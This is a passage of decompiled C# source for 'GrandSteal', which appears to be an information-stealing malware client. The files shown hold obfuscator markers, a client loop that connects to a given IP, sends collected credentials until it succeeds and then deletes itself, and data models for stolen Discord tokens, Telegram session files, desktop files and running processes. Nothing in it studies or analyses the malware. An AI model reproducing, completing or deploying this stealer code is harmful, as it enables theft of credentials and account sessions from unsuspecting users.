23 | 		private static Settings defaultInstance = (Settings)SettingsBase.Synchronized(new Settings());
24 | 	}
25 | }
26 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.Models/GrandSteal.Client.Models/System/Runtime/CompilerServices/ExtensionAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace System.Runtime.CompilerServices
 4 | {
 5 | 	// Token: 0x02000002 RID: 2
 6 | 	[AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Class | AttributeTargets.Method)]
 7 | 	public sealed class ExtensionAttribute : Attribute
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.ViewModels/GrandSteal.Client.ViewModels/-Module-.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x02000001 RID: 1
4 | internal class <Module>
5 | {
6 | }
7 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.ViewModels/GrandSteal.Client.ViewModels/AppViewModel.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.CompilerServices;
 3 | using GrandSteal.Client.Data.Helpers;
 4 | using GrandSteal.Client.Data.Server;
 5 | 
 6 | namespace GrandSteal.Client.ViewModels
 7 | {
 8 | 	// Token: 0x02000002 RID: 2
 9 | 	public class AppViewModel
10 | 	{
11 | 		// Token: 0x17000001 RID: 1
12 | 		// (get) Token: 0x06000002 RID: 2 RVA: 0x00002052 File Offset: 0x00000252
13 | 		private ServerManager ServerManager
14 | 		{
15 | 			[CompilerGenerated]
16 | 			get
17 | 			{
18 | 				return this.<ServerManager>k__BackingField;
19 | 			}
20 | 		}
21 | 
22 | 		// Token: 0x17000002 RID: 2
23 | 		// (get) Token: 0x06000003 RID: 3 RVA: 0x0000205A File Offset: 0x0000025A
24 | 		private SetupManager SetupManager
25 | 		{
26 | 			[CompilerGenerated]
27 | 			get
28 | 			{
29 | 				return this.<SetupManager>k__BackingField;
30 | 			}
31 | 		}
32 | 
33 | 		// Token: 0x06000004 RID: 4 RVA: 0x00002062 File Offset: 0x00000262
34 | 		public AppViewModel(string IP, string ID = "TestID")
35 | 		{
36 | 			this.<SetupManager>k__BackingField = new SetupManager();
37 | 			this.<ServerManager>k__BackingField = new ServerManager(IP, ID);
38 | 		}
39 | 
40 | 		// Token: 0x06000005 RID: 5 RVA: 0x0000208C File Offset: 0x0000028C
41 | 		public void Run()
42 | 		{
43 | 			try
44 | 			{
45 | 				this.SetupManager.CheckUpdate();
46 | 				bool flag = false;
47 | 				if (this.ServerManager.Start()())
48 | 				{
49 | 					while (!flag)
50 | 					{
51 | 						flag = this.ServerManager.SendCredentials();
52 | 					}
53 | 				}
54 | 			}
55 | 			catch
56 | 			{
57 | 			}
58 | 			finally
59 | 			{
60 | 				this.SetupManager.RemoveSelf();
61 | 			}
62 | 		}
63 | 	}
64 | }
65 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.ViewModels/GrandSteal.Client.ViewModels/ConfusedByAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x02000003 RID: 3
 4 | internal class ConfusedByAttribute : Attribute
 5 | {
 6 | 	// Token: 0x06000006 RID: 6 RVA: 0x00002082 File Offset: 0x00000282
 7 | 	public ConfusedByAttribute(string string_0)
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.Client.ViewModels/GrandSteal.Client.ViewModels/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Diagnostics;
 3 | using System.Reflection;
 4 | using System.Runtime.CompilerServices;
 5 | using System.Runtime.InteropServices;
 6 | 
 7 | [assembly: AssemblyVersion("1.0.0.0")]
 8 | [assembly: AssemblyTrademark("")]
 9 | [assembly: AssemblyCopyright("Copyright ©  2018")]
10 | [assembly: AssemblyProduct("GrandSteal.Client.ViewModels")]
11 | [assembly: AssemblyFileVersion("1.0.0.0")]
12 | [assembly: Guid("2108d776-ecab-4d8e-bc42-bbab1b9b647c")]
13 | [assembly: ComVisible(false)]
14 | [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]
15 | [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
16 | [assembly: CompilationRelaxations(8)]
17 | [assembly: AssemblyTitle("GrandSteal.Client.ViewModels")]
18 | [assembly: AssemblyCompany("")]
19 | [assembly: AssemblyConfiguration("")]
20 | [assembly: AssemblyDescription("")]
21 | [module: ConfusedBy("ConfuserEx v1.0.0-33-ga1d8d38")]
22 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/-Module-.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | 
3 | // Token: 0x02000001 RID: 1
4 | internal class <Module>
5 | {
6 | }
7 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/CommunicationObject.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | using System.Runtime.CompilerServices;
 4 | using ProtoBuf;
 5 | 
 6 | namespace GrandSteal.SharedModels.Communication
 7 | {
 8 | 	// Token: 0x02000015 RID: 21
 9 | 	[ProtoContract(Name = "CommunicationObject")]
10 | 	public class CommunicationObject : INotifyPropertyChanged
11 | 	{
12 | 		// Token: 0x17000056 RID: 86
13 | 		// (get) Token: 0x060000F3 RID: 243 RVA: 0x00002ED6 File Offset: 0x000010D6
14 | 		// (set) Token: 0x060000F4 RID: 244 RVA: 0x00002EDE File Offset: 0x000010DE
15 | 		[ProtoMember(1, Name = "Version")]
16 | 		public string Version
17 | 		{
18 | 			get;
19 | 			set;
20 | 		}
21 | 
22 | 		// Token: 0x060000F5 RID: 245 RVA: 0x00002EE7 File Offset: 0x000010E7
23 | 		protected void OnPropertyChanged(string propertyName)
24 | 		{
25 | 			PropertyChangedEventHandler expr_06 = this.PropertyChanged;
26 | 			if (expr_06 == null)
27 | 			{
28 | 				return;
29 | 			}
30 | 			expr_06(this, new PropertyChangedEventArgs(propertyName));
31 | 		}
32 | 
33 | 		// Token: 0x1400000F RID: 15
34 | 		// (add) Token: 0x060000F6 RID: 246 RVA: 0x00003F98 File Offset: 0x00002198
35 | 		// (remove) Token: 0x060000F7 RID: 247 RVA: 0x00003FD0 File Offset: 0x000021D0
36 | 		[method: CompilerGenerated]
37 | 		[CompilerGenerated]
38 | 		public event PropertyChangedEventHandler PropertyChanged;
39 | 	}
40 | }
41 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/ProtoHelper.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections;
 3 | using System.Collections.Generic;
 4 | using ProtoBuf.Meta;
 5 | 
 6 | namespace GrandSteal.SharedModels.Communication
 7 | {
 8 | 	// Token: 0x02000016 RID: 22
 9 | 	public static class ProtoHelper
10 | 	{
11 | 		// Token: 0x060000F9 RID: 249 RVA: 0x00004008 File Offset: 0x00002208
12 | 		public static void PopulateTypes(Type t)
13 | 		{
14 | 			using (IEnumerator enumerator = RuntimeTypeModel.Default.GetTypes().GetEnumerator())
15 | 			{
16 | 				while (enumerator.MoveNext())
17 | 				{
18 | 					MetaType metaType;
19 | 					if ((metaType = (enumerator.Current as MetaType)) != null && metaType.Type == t)
20 | 					{
21 | 						return;
22 | 					}
23 | 				}
24 | 			}
25 | 			Type typeFromHandle = typeof(object);
26 | 			List<Type> list = new List<Type>();
27 | 			do
28 | 			{
29 | 				list.Insert(0, t);
30 | 				t = t.BaseType;
31 | 				if (t == null)
32 | 				{
33 | 					break;
34 | 				}
35 | 			}
36 | 			while (t != typeFromHandle);
37 | 			int i = 0;
38 | 			while (i < list.Count - 1)
39 | 			{
40 | 				Type type = list[i];
41 | 				MetaType metaType2 = null;
42 | 				bool flag = false;
43 | 				RuntimeTypeModel expr_A3 = RuntimeTypeModel.Default;
44 | 				using (IEnumerator enumerator = ((expr_A3 != null) ? expr_A3.GetTypes() : null).GetEnumerator())
45 | 				{
46 | 					while (enumerator.MoveNext())
47 | 					{
48 | 						MetaType metaType3 = (MetaType)enumerator.Current;
49 | 						if (metaType3.Name.Equals(type.Name))
50 | 						{
51 | 							flag = true;
52 | 							metaType2 = metaType3;
53 | 							break;
54 | 						}
55 | 					}
56 | 					goto IL_142;
57 | 				}
58 | 				goto IL_101;
59 | 				IL_117:
60 | 				metaType2.AddSubType((metaType2.GetSubtypes().Length + 1) * 100, list[i + 1]);
61 | 				i++;
62 | 				continue;
63 | 				IL_101:
64 | 				RuntimeTypeModel expr_106 = RuntimeTypeModel.Default;
65 | 				metaType2 = ((expr_106 != null) ? expr_106.Add(type, true) : null);
66 | 				goto IL_117;
67 | 				IL_142:
68 | 				if (!flag)
69 | 				{
70 | 					goto IL_101;
71 | 				}
72 | 				goto IL_117;
73 | 			}
74 | 		}
75 | 	}
76 | }
77 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/Request.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Communication
 5 | {
 6 | 	// Token: 0x02000017 RID: 23
 7 | 	[ProtoContract(Name = "Request")]
 8 | 	public class Request<T> : RequestBase
 9 | 	{
10 | 		// Token: 0x060000FA RID: 250 RVA: 0x0000417C File Offset: 0x0000237C
11 | 		public Request() : this(default(T), string.Empty)
12 | 		{
13 | 		}
14 | 
15 | 		// Token: 0x060000FB RID: 251 RVA: 0x000041A0 File Offset: 0x000023A0
16 | 		public Request(T _body, string name)
17 | 		{
18 | 			if (_body == null)
19 | 			{
20 | 				if (typeof(T).IsClass && typeof(T).GetConstructor(Type.EmptyTypes) != null)
21 | 				{
22 | 					_body = Activator.CreateInstance<T>();
23 | 				}
24 | 				else
25 | 				{
26 | 					_body = default(T);
27 | 				}
28 | 			}
29 | 			this.Body = _body;
30 | 			base.Name = (string.IsNullOrEmpty(name) ? string.Empty : name);
31 | 		}
32 | 
33 | 		// Token: 0x17000057 RID: 87
34 | 		// (get) Token: 0x060000FC RID: 252 RVA: 0x00004210 File Offset: 0x00002410
35 | 		// (set) Token: 0x060000FD RID: 253 RVA: 0x00002F00 File Offset: 0x00001100
36 | 		[ProtoMember(2, Name = "Body")]
37 | 		public T Body
38 | 		{
39 | 			get
40 | 			{
41 | 				if (this._body == null)
42 | 				{
43 | 					if (typeof(T).IsClass && typeof(T).GetConstructor(Type.EmptyTypes) != null)
44 | 					{
45 | 						this._body = Activator.CreateInstance<T>();
46 | 					}
47 | 					else
48 | 					{
49 | 						this._body = default(T);
50 | 					}
51 | 					base.OnPropertyChanged("Body");
52 | 				}
53 | 				return this._body;
54 | 			}
55 | 			set
56 | 			{
57 | 				this._body = value;
58 | 				base.OnPropertyChanged("Body");
59 | 			}
60 | 		}
61 | 
62 | 		// Token: 0x0400006F RID: 111
63 | 		private T _body;
64 | 	}
65 | }
66 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/RequestBase.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Communication
 5 | {
 6 | 	// Token: 0x02000018 RID: 24
 7 | 	[ProtoContract(Name = "RequestBase")]
 8 | 	public class RequestBase : CommunicationObject
 9 | 	{
10 | 		// Token: 0x060000FE RID: 254 RVA: 0x00002F14 File Offset: 0x00001114
11 | 		public RequestBase()
12 | 		{
13 | 			this.Randomizer = new Random();
14 | 			this.Letters = "qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM";
15 | 		}
16 | 
17 | 		// Token: 0x17000058 RID: 88
18 | 		// (get) Token: 0x060000FF RID: 255 RVA: 0x00002F32 File Offset: 0x00001132
19 | 		// (set) Token: 0x06000100 RID: 256 RVA: 0x00002F3A File Offset: 0x0000113A
20 | 		[ProtoMember(1, Name = "Name")]
21 | 		public string Name
22 | 		{
23 | 			get
24 | 			{
25 | 				return this._name;
26 | 			}
27 | 			set
28 | 			{
29 | 				this._name = value;
30 | 				base.OnPropertyChanged("Name");
31 | 			}
32 | 		}
33 | 
34 | 		// Token: 0x17000059 RID: 89
35 | 		// (get) Token: 0x06000101 RID: 257 RVA: 0x00002F4E File Offset: 0x0000114E
36 | 		// (set) Token: 0x06000102 RID: 258 RVA: 0x00002F7C File Offset: 0x0000117C
37 | 		[ProtoMember(2, Name = "ID")]
38 | 		public string ID
39 | 		{
40 | 			get
41 | 			{
42 | 				if (string.IsNullOrEmpty(this._iD))
43 | 				{
44 | 					this._iD = this.GenerateUniqueId(10);
45 | 					base.OnPropertyChanged("ID");
46 | 				}
47 | 				return this._iD;
48 | 			}
49 | 			set
50 | 			{
51 | 				this._iD = value;
52 | 				base.OnPropertyChanged("ID");
53 | 			}
54 | 		}
55 | 
56 | 		// Token: 0x06000103 RID: 259 RVA: 0x00002F90 File Offset: 0x00001190
57 | 		public Response<T> CreateResponse<T>(T _responseBody)
58 | 		{
59 | 			return new Response<T>(_responseBody)
60 | 			{
61 | 				ID = this.ID
62 | 			};
63 | 		}
64 | 
65 | 		// Token: 0x06000104 RID: 260 RVA: 0x0000427C File Offset: 0x0000247C
66 | 		private string GenerateUniqueId(int length)
67 | 		{
68 | 			string text = string.Empty;
69 | 			for (int i = 0; i < length; i++)
70 | 			{
71 | 				text += this.Letters[this.Randomizer.Next(0, this.Letters.Length - 1)].ToString();
72 | 			}
73 | 			return text;
74 | 		}
75 | 
76 | 		// Token: 0x04000070 RID: 112
77 | 		private string _name;
78 | 
79 | 		// Token: 0x04000071 RID: 113
80 | 		private string _iD;
81 | 
82 | 		// Token: 0x04000072 RID: 114
83 | 		private readonly string Letters;
84 | 
85 | 		// Token: 0x04000073 RID: 115
86 | 		private readonly Random Randomizer;
87 | 	}
88 | }
89 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/Response.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Communication
 5 | {
 6 | 	// Token: 0x02000019 RID: 25
 7 | 	[ProtoContract(Name = "Response")]
 8 | 	public class Response<T> : ResponseBase
 9 | 	{
10 | 		// Token: 0x06000105 RID: 261 RVA: 0x000042D0 File Offset: 0x000024D0
11 | 		public Response() : this(default(T))
12 | 		{
13 | 		}
14 | 
15 | 		// Token: 0x06000106 RID: 262 RVA: 0x000042EC File Offset: 0x000024EC
16 | 		public Response(T _body)
17 | 		{
18 | 			if (_body == null)
19 | 			{
20 | 				if (typeof(T).IsClass && typeof(T).GetConstructor(Type.EmptyTypes) != null)
21 | 				{
22 | 					_body = Activator.CreateInstance<T>();
23 | 				}
24 | 				else
25 | 				{
26 | 					_body = default(T);
27 | 				}
28 | 			}
29 | 			this.Body = _body;
30 | 		}
31 | 
32 | 		// Token: 0x1700005A RID: 90
33 | 		// (get) Token: 0x06000107 RID: 263 RVA: 0x00004348 File Offset: 0x00002548
34 | 		// (set) Token: 0x06000108 RID: 264 RVA: 0x00002FA4 File Offset: 0x000011A4
35 | 		[ProtoMember(1, Name = "Body")]
36 | 		public T Body
37 | 		{
38 | 			get
39 | 			{
40 | 				if (this._responseBody == null)
41 | 				{
42 | 					if (typeof(T).IsClass && typeof(T).GetConstructor(Type.EmptyTypes) != null)
43 | 					{
44 | 						this._responseBody = Activator.CreateInstance<T>();
45 | 					}
46 | 					else
47 | 					{
48 | 						this._responseBody = default(T);
49 | 					}
50 | 					base.OnPropertyChanged("Body");
51 | 				}
52 | 				return this._responseBody;
53 | 			}
54 | 			set
55 | 			{
56 | 				this._responseBody = value;
57 | 				base.OnPropertyChanged("Body");
58 | 			}
59 | 		}
60 | 
61 | 		// Token: 0x04000074 RID: 116
62 | 		private T _responseBody;
63 | 	}
64 | }
65 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Communication/ResponseBase.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Communication
 5 | {
 6 | 	// Token: 0x0200001A RID: 26
 7 | 	[ProtoContract(Name = "ResponseBase")]
 8 | 	public class ResponseBase : CommunicationObject
 9 | 	{
10 | 		// Token: 0x1700005B RID: 91
11 | 		// (get) Token: 0x06000109 RID: 265 RVA: 0x00002FB8 File Offset: 0x000011B8
12 | 		// (set) Token: 0x0600010A RID: 266 RVA: 0x00002FE3 File Offset: 0x000011E3
13 | 		[ProtoMember(1, Name = "ID")]
14 | 		public string ID
15 | 		{
16 | 			get
17 | 			{
18 | 				if (string.IsNullOrEmpty(this._responseID))
19 | 				{
20 | 					this._responseID = string.Empty;
21 | 					base.OnPropertyChanged("ID");
22 | 				}
23 | 				return this._responseID;
24 | 			}
25 | 			set
26 | 			{
27 | 				this._responseID = value;
28 | 				base.OnPropertyChanged("ID");
29 | 			}
30 | 		}
31 | 
32 | 		// Token: 0x04000075 RID: 117
33 | 		private string _responseID;
34 | 	}
35 | }
36 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/ConfusedByAttribute.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | // Token: 0x0200001B RID: 27
 4 | internal class ConfusedByAttribute : Attribute
 5 | {
 6 | 	// Token: 0x0600010C RID: 268 RVA: 0x00002FFF File Offset: 0x000011FF
 7 | 	public ConfusedByAttribute(string string_0)
 8 | 	{
 9 | 	}
10 | }
11 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/DesktopFile.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | using System.Runtime.CompilerServices;
 4 | using ProtoBuf;
 5 | 
 6 | namespace GrandSteal.SharedModels.Models
 7 | {
 8 | 	// Token: 0x0200000F RID: 15
 9 | 	[ProtoContract(Name = "DesktopFile")]
10 | 	public class DesktopFile : INotifyPropertyChanged
11 | 	{
12 | 		// Token: 0x1700003C RID: 60
13 | 		// (get) Token: 0x060000A7 RID: 167 RVA: 0x00002A18 File Offset: 0x00000C18
14 | 		// (set) Token: 0x060000A8 RID: 168 RVA: 0x00002A20 File Offset: 0x00000C20
15 | 		[ProtoMember(1, Name = "Filename")]
16 | 		public string Filename
17 | 		{
18 | 			get
19 | 			{
20 | 				return this._filename;
21 | 			}
22 | 			set
23 | 			{
24 | 				this._filename = value;
25 | 				PropertyChangedEventHandler expr_0D = this.PropertyChanged;
26 | 				if (expr_0D == null)
27 | 				{
28 | 					return;
29 | 				}
30 | 				expr_0D(this, new PropertyChangedEventArgs("Filename"));
31 | 			}
32 | 		}
33 | 
34 | 		// Token: 0x1700003D RID: 61
35 | 		// (get) Token: 0x060000A9 RID: 169 RVA: 0x00002A44 File Offset: 0x00000C44
36 | 		// (set) Token: 0x060000AA RID: 170 RVA: 0x00002A4C File Offset: 0x00000C4C
37 | 		[ProtoMember(2, Name = "FileData")]
38 | 		public byte[] FileData
39 | 		{
40 | 			get
41 | 			{
42 | 				return this._fileData;
43 | 			}
44 | 			set
45 | 			{
46 | 				this._fileData = value;
47 | 				PropertyChangedEventHandler expr_0D = this.PropertyChanged;
48 | 				if (expr_0D == null)
49 | 				{
50 | 					return;
51 | 				}
52 | 				expr_0D(this, new PropertyChangedEventArgs("FileData"));
53 | 			}
54 | 		}
55 | 
56 | 		// Token: 0x1400000A RID: 10
57 | 		// (add) Token: 0x060000AB RID: 171 RVA: 0x00003A1C File Offset: 0x00001C1C
58 | 		// (remove) Token: 0x060000AC RID: 172 RVA: 0x00003A54 File Offset: 0x00001C54
59 | 		[method: CompilerGenerated]
60 | 		[CompilerGenerated]
61 | 		public event PropertyChangedEventHandler PropertyChanged;
62 | 
63 | 		// Token: 0x04000048 RID: 72
64 | 		private string _filename;
65 | 
66 | 		// Token: 0x04000049 RID: 73
67 | 		private byte[] _fileData;
68 | 	}
69 | }
70 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/DiscordSession.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using ProtoBuf;
 4 | 
 5 | namespace GrandSteal.SharedModels.Models
 6 | {
 7 | 	// Token: 0x0200000C RID: 12
 8 | 	[ProtoContract(Name = "DiscordSession")]
 9 | 	public class DiscordSession
10 | 	{
11 | 		// Token: 0x17000034 RID: 52
12 | 		// (get) Token: 0x06000092 RID: 146 RVA: 0x0000295A File Offset: 0x00000B5A
13 | 		// (set) Token: 0x06000093 RID: 147 RVA: 0x00002962 File Offset: 0x00000B62
14 | 		[ProtoMember(1, Name = "token")]
15 | 		public string token
16 | 		{
17 | 			get;
18 | 			set;
19 | 		}
20 | 
21 | 		// Token: 0x17000035 RID: 53
22 | 		// (get) Token: 0x06000094 RID: 148 RVA: 0x0000296B File Offset: 0x00000B6B
23 | 		// (set) Token: 0x06000095 RID: 149 RVA: 0x00002973 File Offset: 0x00000B73
24 | 		[ProtoMember(2, Name = "events")]
25 | 		public List<Event> events
26 | 		{
27 | 			get;
28 | 			set;
29 | 		}
30 | 	}
31 | }
32 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/Event.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Models
 5 | {
 6 | 	// Token: 0x0200000B RID: 11
 7 | 	[ProtoContract(Name = "Event")]
 8 | 	public class Event
 9 | 	{
10 | 		// Token: 0x17000032 RID: 50
11 | 		// (get) Token: 0x0600008D RID: 141 RVA: 0x00002938 File Offset: 0x00000B38
12 | 		// (set) Token: 0x0600008E RID: 142 RVA: 0x00002940 File Offset: 0x00000B40
13 | 		[ProtoMember(1, Name = "type")]
14 | 		public string type
15 | 		{
16 | 			get;
17 | 			set;
18 | 		}
19 | 
20 | 		// Token: 0x17000033 RID: 51
21 | 		// (get) Token: 0x0600008F RID: 143 RVA: 0x00002949 File Offset: 0x00000B49
22 | 		// (set) Token: 0x06000090 RID: 144 RVA: 0x00002951 File Offset: 0x00000B51
23 | 		[ProtoMember(2, Name = "properties")]
24 | 		public Properties properties
25 | 		{
26 | 			get;
27 | 			set;
28 | 		}
29 | 	}
30 | }
31 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/HardwareType.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GrandSteal.SharedModels.Models
 4 | {
 5 | 	// Token: 0x02000012 RID: 18
 6 | 	public enum HardwareType
 7 | 	{
 8 | 		// Token: 0x04000054 RID: 84
 9 | 		Processor,
10 | 		// Token: 0x04000055 RID: 85
11 | 		Graphic
12 | 	}
13 | }
14 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/Properties.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Models
 5 | {
 6 | 	// Token: 0x0200000A RID: 10
 7 | 	[ProtoContract(Name = "Properties")]
 8 | 	public class Properties
 9 | 	{
10 | 		// Token: 0x1700002D RID: 45
11 | 		// (get) Token: 0x06000082 RID: 130 RVA: 0x000028E3 File Offset: 0x00000AE3
12 | 		// (set) Token: 0x06000083 RID: 131 RVA: 0x000028EB File Offset: 0x00000AEB
13 | 		[ProtoMember(1, Name = "client_track_timestamp")]
14 | 		public string client_track_timestamp
15 | 		{
16 | 			get;
17 | 			set;
18 | 		}
19 | 
20 | 		// Token: 0x1700002E RID: 46
21 | 		// (get) Token: 0x06000084 RID: 132 RVA: 0x000028F4 File Offset: 0x00000AF4
22 | 		// (set) Token: 0x06000085 RID: 133 RVA: 0x000028FC File Offset: 0x00000AFC
23 | 		[ProtoMember(2, Name = "num_users_visible")]
24 | 		public int num_users_visible
25 | 		{
26 | 			get;
27 | 			set;
28 | 		}
29 | 
30 | 		// Token: 0x1700002F RID: 47
31 | 		// (get) Token: 0x06000086 RID: 134 RVA: 0x00002905 File Offset: 0x00000B05
32 | 		// (set) Token: 0x06000087 RID: 135 RVA: 0x0000290D File Offset: 0x00000B0D
33 | 		[ProtoMember(3, Name = "num_users_visible_with_mobile_indicator")]
34 | 		public int num_users_visible_with_mobile_indicator
35 | 		{
36 | 			get;
37 | 			set;
38 | 		}
39 | 
40 | 		// Token: 0x17000030 RID: 48
41 | 		// (get) Token: 0x06000088 RID: 136 RVA: 0x00002916 File Offset: 0x00000B16
42 | 		// (set) Token: 0x06000089 RID: 137 RVA: 0x0000291E File Offset: 0x00000B1E
43 | 		[ProtoMember(4, Name = "client_uuid")]
44 | 		public string client_uuid
45 | 		{
46 | 			get;
47 | 			set;
48 | 		}
49 | 
50 | 		// Token: 0x17000031 RID: 49
51 | 		// (get) Token: 0x0600008A RID: 138 RVA: 0x00002927 File Offset: 0x00000B27
52 | 		// (set) Token: 0x0600008B RID: 139 RVA: 0x0000292F File Offset: 0x00000B2F
53 | 		[ProtoMember(5, Name = "client_send_timestamp")]
54 | 		public string client_send_timestamp
55 | 		{
56 | 			get;
57 | 			set;
58 | 		}
59 | 	}
60 | }
61 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/RemoteProcess.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using ProtoBuf;
 3 | 
 4 | namespace GrandSteal.SharedModels.Models
 5 | {
 6 | 	// Token: 0x0200000D RID: 13
 7 | 	[ProtoContract(Name = "RemoteProcess")]
 8 | 	public class RemoteProcess
 9 | 	{
10 | 		// Token: 0x17000036 RID: 54
11 | 		// (get) Token: 0x06000097 RID: 151 RVA: 0x0000297C File Offset: 0x00000B7C
12 | 		// (set) Token: 0x06000098 RID: 152 RVA: 0x00002984 File Offset: 0x00000B84
13 | 		[ProtoMember(1, Name = "ProcessID")]
14 | 		public int ProcessID
15 | 		{
16 | 			get;
17 | 			set;
18 | 		}
19 | 
20 | 		// Token: 0x17000037 RID: 55
21 | 		// (get) Token: 0x06000099 RID: 153 RVA: 0x0000298D File Offset: 0x00000B8D
22 | 		// (set) Token: 0x0600009A RID: 154 RVA: 0x00002995 File Offset: 0x00000B95
23 | 		[ProtoMember(2, Name = "ProcessName")]
24 | 		public string ProcessName
25 | 		{
26 | 			get;
27 | 			set;
28 | 		}
29 | 
30 | 		// Token: 0x17000038 RID: 56
31 | 		// (get) Token: 0x0600009B RID: 155 RVA: 0x0000299E File Offset: 0x00000B9E
32 | 		// (set) Token: 0x0600009C RID: 156 RVA: 0x000029A6 File Offset: 0x00000BA6
33 | 		[ProtoMember(3, Name = "ProcessCommandLine")]
34 | 		public string ProcessCommandLine
35 | 		{
36 | 			get;
37 | 			set;
38 | 		}
39 | 
40 | 		// Token: 0x17000039 RID: 57
41 | 		// (get) Token: 0x0600009D RID: 157 RVA: 0x000029AF File Offset: 0x00000BAF
42 | 		// (set) Token: 0x0600009E RID: 158 RVA: 0x000029B7 File Offset: 0x00000BB7
43 | 		[ProtoMember(4, Name = "ProcessUsername")]
44 | 		public string ProcessUsername
45 | 		{
46 | 			get;
47 | 			set;
48 | 		}
49 | 	}
50 | }
51 | 


--------------------------------------------------------------------------------
/GrandSteal/GrandSteal.SharedModels/GrandSteal.SharedModels/Models/TelegramSession.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.ComponentModel;
 3 | using System.Runtime.CompilerServices;
 4 | using ProtoBuf;
 5 | 
 6 | namespace GrandSteal.SharedModels.Models
 7 | {
 8 | 	// Token: 0x0200000E RID: 14
 9 | 	[ProtoContract(Name = "TelegramSession")]
10 | 	public class TelegramSession : INotifyPropertyChanged
11 | 	{
12 | 		// Token: 0x1700003A RID: 58
13 | 		// (get) Token: 0x060000A0 RID: 160 RVA: 0x000029C0 File Offset: 0x00000BC0
14 | 		// (set) Token: 0x060000A1 RID: 161 RVA: 0x000029C8 File Offset: 0x00000BC8
15 | 		[ProtoMember(1, Name = "RootFile")]
16 | 		public DesktopFile RootFile
17 | 		{
18 | 			get
19 | 			{
20 | 				return this._rootFile;
21 | 			}
22 | 			set
23 | 			{
24 | 				this._rootFile = value;
25 | 				PropertyChangedEventHandler expr_0D = this.PropertyChanged;
26 | 				if (expr_0D == null)
27 | 				{
28 | 					return;
29 | 				}
30 | 				expr_0D(this, new PropertyChangedEventArgs("RootFile"));
31 | 			}
32 | 		}
33 | 
34 | 		// Token: 0x1700003B RID: 59
35 | 		// (get) Token: 0x060000A2 RID: 162 RVA: 0x000029EC File Offset: 0x00000BEC
36 | 		// (set) Token: 0x060000A3 RID: 163 RVA: 0x000029F4 File Offset: 0x00000BF4
37 | 		[ProtoMember(2, Name = "MapFile")]
38 | 		public DesktopFile MapFile
39 | 		{
40 | 			get
41 | 			{
42 | 				return this._mapFile;
43 | 			}
44 | 			set
45 | 			{
46 | 				this._mapFile = value;
47 | 				PropertyChangedEventHandler expr_0D = this.PropertyChanged;
48 | 				if (expr_0D == null)
49 | 				{
50 | 					return;
51 | 				}
52 | 				expr_0D(this, new PropertyChangedEventArgs("MapFile"));
53 | 			}
54 | 		}
55 | 
56 | 		// Token: 0x14000009 RID: 9
57 | 		// (add) Token: 0x060000A4 RID: 164 RVA: 0x000039AC File Offset: 0x00001BAC
